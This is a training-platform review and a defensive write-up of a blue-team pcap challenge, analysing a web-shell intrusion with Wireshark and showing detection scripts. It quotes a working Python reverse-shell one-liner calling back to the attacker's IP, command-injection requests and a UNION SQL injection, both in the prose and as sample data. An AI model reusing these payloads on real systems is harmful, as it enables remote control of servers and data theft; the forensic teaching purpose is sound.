CYBERSECURITY JOB HUNTING GUIDE

BLUE TEAM LABS ONLINE

Author: Stefan Waldvogel

BTLO is a new blue-team training platform

Overview:
Blue Team Labs Online (BTLO) is a training platform for blue-team knowledge. You learn how to defend a company, and you gain valuable skills. The platform has two areas: challenges and investigations. You can start with the free challenges; right now (May 2021) there are about 20 of them.
You get 2 free investigations and 30 in the pro version.
If you are starting your career, try the free content first, and if you like it, move on to the paid content.

HR relevant: 
no

Advantages: 
One of the most significant advantages is the price. Many modules are free, so you can sharpen your skills and get job-ready. Labs like BTLO offer hands-on knowledge and are based on actual incidents.
The website has a point system that motivates you to learn more.
Retired challenges allow write-ups, so you can learn very efficiently.

Disadvantages:
Very hard to find; HR and companies may not know about this new form of hands-on learning.

Pricing:
free, $30 a month for the pro labs

Recertification costs: 
-none-

Website:
blueteamlabs.online/
Small introduction
Do you want to know more about the style and quality? I will show you some details about the "Network Analysis - Web Shell" challenge. This module is retired, so write-ups are allowed.

Hint: You can find write-ups on the official website. I do not follow the questions; this is more about what you do when you get a pcap file.

You find "Network Analysis - Web Shell" under Challenges:
When you start the challenge, you get an excellent overview with a lot of information: your goals, the situation, and the questions.
What is nice:
You can use any tool you like. This is a realistic scenario, and if you do not know any tools, you get three options:
  • Wireshark
  • TCPDump
  • TShark
Let us talk about these options first. Wireshark is great for beginners and has a GUI; TShark is more or less Wireshark without a GUI and very fast; TCPDump is a separate, command-line based program.
Download the file and load it into Wireshark. You get a warning "This is real malware" -> always use a VM for your training.
If you use Ubuntu, Wireshark is not installed by default; install it with:
sudo apt update
sudo apt upgrade
sudo apt install wireshark

If you get an error that sudo is not installed, switch to the root user with
sudo su
-> this is usually not recommended, but in a VM it is okay.
Start Wireshark in a terminal with the command
wireshark
You see something like this:
If you use Wireshark for the first time, try to understand the big picture. You see your network interfaces, and you can listen to the traffic on them.
Other options are available. One example: you can run Wireshark remotely, logging into a different system with SSH and collecting the data there.
Wireshark is a mighty tool. This lab is a beginner lab; we use only essential functions.

Import the pcap file
You can import the pcap under File -> Open. Here you have to pick the path; it should be under /home/{your user name}/Downloads
If you open it, you see more information and about 17,000 rows. This is massive; you cannot read all rows, and we need filters to find the wanted data.

Wireshark has built-in tools to analyze the traffic, so we can look at the statistics.

The starting point
Scroll through the traffic and you will notice HTTP traffic. This is great, because HTTP is unencrypted: we can read the requests and responses, and if we can read them, Wireshark can read them, too. Let us look at line 14:
This is an HTTP GET request. The machine with the IP 172.20.10.5 is asking a web server on 172.20.10.2.
Something like this happens all the time. These are two internal machines (class C network) talking to each other.
-> It is HTTP traffic, so most likely many packets belong together. We can use Wireshark to see all related packets.
Right-click on line 14 -> Follow -> HTTP Stream

Can you see something special? Do you understand the big picture?
If you have never seen such an output, there are a lot of lines and it is overwhelming. What can we see?
We have two different colors (blue and red). One machine is blue and the second is red.
If you scroll around, you see input labels for password and username. This is important: an HTTP GET request transmits usernames and passwords unencrypted.
Here it is a login field for a "Register Complaint" website.

If you read the data, you might understand the idea. Someone used a blank username and password, wanted to download something, and it failed. We got a 404 error message and an "unable to find users" message.

Is this malicious? Maybe, maybe not. We got a very specific message, "unable to find user", and with such a message an attacker can enumerate users. Assume we have a correct user but the wrong password; it might then say "wrong password".
This is only one request; it could be someone who just forgot the username.

If you do such labs, try to understand the bigger picture, especially if you have never seen all the data before. Most malicious traffic hides behind a ton of legitimate traffic.

Different approach with files
Wireshark is smart and detects documents and files. Go to File -> Export Objects -> HTTP
Now you see much more detail. Scroll through the list and think: what looks suspicious, and what is going on?
Download all the files to a folder and look around. Can you see something suspicious?
What about this:
First row
The command whoami is a Linux command, and most attackers use "whoami" to see their own privilege level.
The answer could be www-data or maybe root.
The program is: dbfunctions.php
Someone can use dbfunctions.php to inject commands into the web server. This is called "command injection" and is a major problem. Use Google if you want to learn more about it.
-> If you take certs like PenTest+, you need to know this.
One question is: why is this program on this server? Is the function wanted or malicious? Such a feature is most likely not wanted.

Fifth row
This is a very long file name, and the word UNION is visible. This attack is called "UNION SQL injection." Many websites had this vulnerability.
Do you want to know more about such attacks? You find free training here: tryhackme.com/room/owaspjuiceshop
Again, if you take certs, you need to understand these attacks (and how to mitigate them).

We found two weird things.
We can sort the file list and look for bigger files. In one of them, we see details about the dbfunctions.php file.
This .php file allows an attacker to inject commands.

How does it work?
An attacker finds a way to upload data to the server and uploads a new page, here dbfunctions.php. Now the attacker can browse to this new page and inject commands. This works because the user running the website is most likely www-data, and it executes the command on behalf of the attacker. If the www-data user has root rights, the attacker has full control over the machine.

If you go back to the questions for the challenge, you see some questions about this. If you do such labs, do more than just collect the points. Try to understand why things work, and read or ask other students. Cybersecurity is about teamwork and networking.
Now you should be able to answer the last questions. Sort the HTTP object list by Packet and you get:
"What is the first command executed by the attacker? (1 points)"
One question is tricky: "What is the name of the php file through which the attacker uploaded a web shell? (1 points)"

We saw the attacker used upload.php, but this is not the wanted answer. BTLO wants the original page name.
We can use the find function under Edit.
Edit -> Find Packet
Now you get a new line where you have to select "String" and enter the wanted word, here "upload.php"

The list is still huge, and we can add a second filter.
Files are uploaded with POST requests, and we can use the display filter:
http.request.method==POST
The list is a bit smaller; we have only two POST requests to /upload.php. In both, the wanted answer is in the "Referer" field. There are multiple ways to extract the data. I used "Follow TCP stream" (right-click on one of these two packets -> Follow) to get the bigger picture.
Try to find the easy answers on your own.
The next, more challenging question is: what type of shell is used?

Build a filter:
We know the attacker used dbfunctions.php to send commands.
The attacker IP is 10.251.96.4 --> the filter is: ip.src==10.251.96.4
If we look closely, we see the commands are submitted via GET requests --> the filter is: http.request.method==GET

The && operator combines both filters:
ip.src==10.251.96.4 && http.request.method==GET
One of these entries is very suspicious and contains a Python script. Follow the data stream and try to understand the output.
It looks like this:
cmd=python%20c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

It is not really readable, but we can use CyberChef to convert the string. The link is:
gchq.github.io/CyberChef/
CyberChef is a very powerful tool and can do much more, but here we want to use "URL Decode." Find the recipe and drag it into the recipe area. Paste the string, and it should look like this:
It looks much better. This kind of shell connects back to the attacker's machine and is called a reverse shell.
Try to find the other answer (the port).
Bonus: one file has a base64-encoded string in it. Find it, decode it, and figure out what it is.
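The URL decoding and the source-IP/GET filter from above can also be scripted. The following is an added example (not from BTLO or the original write-up) that decodes the cmd= parameter, applies the same filter as the Wireshark expression, and flags the command injection, the reverse-shell callback (IP and port) and a UNION injection. The request list is constructed; only the dbfunctions.php cmd values come from the write-up, while /complaints.php and its payload are stand-ins.

```python
import re
from urllib.parse import unquote

# Constructed sample of (src IP, method, request target) tuples modelled on the
# challenge traffic. The dbfunctions.php cmd= values are the ones shown in the
# write-up; /complaints.php and its UNION payload are constructed stand-ins.
REQUESTS = [
    ("10.251.96.4", "GET", "/dbfunctions.php?cmd=whoami"),
    ("10.251.96.4", "GET",
     "/dbfunctions.php?cmd=python%20c%20%27import%20socket,subprocess,os;"
     "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
     "s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20"
     "os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);"
     "p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27"),
    ("10.251.96.4", "GET", "/complaints.php?id=1%20UNION%20SELECT%201,2,3--"),
    ("172.20.10.5", "GET", "/index.php"),
    ("10.251.96.4", "POST", "/upload.php"),
]

# .connect(("IP", PORT)) inside a decoded command is the callback address.
CALLBACK = re.compile(r'\.connect\(\(\s*"(?P<ip>[\d.]+)"\s*,\s*(?P<port>\d+)\s*\)\)')
UNION_SQLI = re.compile(r"\bUNION\b.+?\bSELECT\b", re.IGNORECASE)


def decode_query(target):
    """Split a request target into its path and URL-decoded parameters.
    parse_qs is avoided on purpose: older Pythons also split on ';', which
    would chop the injected one-liner into pieces."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return path, params


def classify(target):
    """Return (tag, detail) findings for one request target."""
    path, params = decode_query(target)
    findings = []
    if UNION_SQLI.search(unquote(target)):
        findings.append(("union_sqli", path))
    if "cmd" in params:  # dbfunctions.php-style command injection
        cmd = params["cmd"]
        findings.append(("command_injection", f"{path} cmd={cmd.split()[0]}"))
        m = CALLBACK.search(cmd)
        if m and "dup2" in cmd and "/bin/sh" in cmd:  # stdio wired to a socket
            findings.append(("reverse_shell", f"{m['ip']}:{m['port']}"))
    return findings


def triage(requests, attacker_ip=None, method="GET"):
    """Same idea as the Wireshark filter ip.src==X && http.request.method==GET:
    keep only the matching requests, then classify them.
    Returns a list of (src, tag, detail)."""
    out = []
    for src, meth, target in requests:
        if meth != method or (attacker_ip and src != attacker_ip):
            continue
        out.extend((src, tag, detail) for tag, detail in classify(target))
    return out
```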

Finish the other answers
One question is about tools. Most tools use the User-Agent field to say "it is me", and therefore we can search for it. The search filter could look like this:
ip.dst == 10.251.96.5 && http.user_agent
You can find one matching agent in many requests. The wanted tool does one thing: it searches for valid pages. Some are hidden, but the program tries hundreds of names.

We touched on the second tool a while ago. Remember the UNION thing? That has to do with SQL injection, and attackers use automated tools for it.

We can open the Export HTTP Objects list again (File -> Export Objects -> HTTP), and if we click on the file with UNION in it, Wireshark jumps to the packet.
Can you find both names and the version number?

What about the port range?
Wireshark has a tool for this, and you can answer the question right away. It is under Statistics -> Conversations -> TCP.
Just sort by port and you get it.

What type is it?
Select one scan and look for the right keywords. One port scanner is nmap, and its default scan is a SYN scan. The command could look like this: nmap -p 1-1000 10.251.96.5
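What you read off Statistics -> Conversations -> TCP can also be checked programmatically. As an added example (not part of the original write-up), the following Python groups constructed conversation records per host pair and reports a pair that touches hundreds of distinct ports with only two or three packets each, the footprint of a SYN scan, together with the port range. The record layout and all values are constructed.

```python
from collections import defaultdict

# Constructed TCP conversation records (src, dst, dst port, packet count),
# modelled on the Statistics -> Conversations -> TCP table: one host probes
# ports 1-1000 on the web server with half-open connections (a SYN plus the
# reply, two or three packets per port), while another pair of hosts talks
# HTTP normally with full handshakes and data transfer.
CONVERSATIONS = (
    [("10.251.96.4", "10.251.96.5", port, 2) for port in range(1, 1001)]
    + [("172.20.10.5", "172.20.10.2", 80, 12)] * 20
    + [("172.20.10.5", "172.20.10.2", 443, 15)] * 5
)
# Open port 80 answers SYN/ACK and gets a RST back: three packets, no data.
CONVERSATIONS[79] = ("10.251.96.4", "10.251.96.5", 80, 3)


def find_port_scans(convs, min_ports=50, max_packets=3):
    """Group conversations per (src, dst). A pair that touches at least
    min_ports distinct ports, almost all of them with max_packets or fewer
    packets, is reported as a SYN (half-open) scan together with the port
    range an analyst would read off the sorted conversation table."""
    ports = defaultdict(set)
    short = defaultdict(int)
    total = defaultdict(int)
    for src, dst, dport, packets in convs:
        key = (src, dst)
        ports[key].add(dport)
        total[key] += 1
        short[key] += int(packets <= max_packets)
    scans = []
    for key, seen in ports.items():
        if len(seen) < min_ports or short[key] / total[key] < 0.9:
            continue
        scans.append({
            "src": key[0],
            "dst": key[1],
            "distinct_ports": len(seen),
            "port_range": (min(seen), max(seen)),
            "scan_type": "SYN scan (half-open)",
        })
    return scans
```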
Conclusion
I didn't follow the questions on purpose, because in the real world you do not have questions. You see one interesting thing, and you start your investigation.
Here, I highlighted the second part.
-> If you do a lab, you can follow the questions, but often you can find much more. Do not limit your creativity; the questions are a help, nothing more.

Bonus section
This is the bonus part, and we play with RITA to find hidden things.

zeek -C -r BTLOPortScan.pcap
sudo rita import /home/stefanr/Downloads/BTLOlab* BTLO1
sudo rita html-report BTLO1 
--> nothing interesting; it was just a try.

nano /etc/rita/config.yaml
© 2021. This work is licensed under a CC BY-SA 4.0 license